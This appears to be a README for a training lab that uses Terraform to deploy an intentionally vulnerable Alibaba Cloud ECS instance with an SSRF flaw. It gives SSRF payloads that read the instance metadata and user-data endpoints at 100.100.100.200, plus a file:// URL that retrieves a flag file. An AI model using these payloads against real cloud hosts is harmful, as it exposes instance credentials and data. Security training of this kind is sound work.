English | 中文
This is a scenario used to build the Alibaba Cloud ECS SSRF vulnerability environment.
After building the environment with Terraform, users can obtain metadata and user data and other information on ECS through the SSRF vulnerabilities.
Execute the following command in the container
cd /TerraformGoat/aliyun/ecs/ecs_ssrf/
Configure Alibaba Cloud Access Credentials
aliyun configure
You can create and view your AccessKey on the AccessKey page of the Alibaba Cloud console
Deploy Vulnerable Environment
terraform init
terraform apply
When the terminal prompts
Enter a value:
, enteryes
After the environment is set up, You can see the access address of the scenario at Outputs, then access to the browser.
On ECS with SSRF vulnerabilities, we can use SSRF to read ECS metadata, user data and other information.
read metadata
http://100.100.100.200/latest/meta-data/
read user data
The premise is that the target has been configured with user data, otherwise will be disconnected.
http://100.100.100.200/latest/user-data/
In the user data information, you can see that there is a flag file in the root directory of the scenario, try to use SSRF to read this file.
file:///flag69152201.txt
Successfully read the flag file.
terraform destroy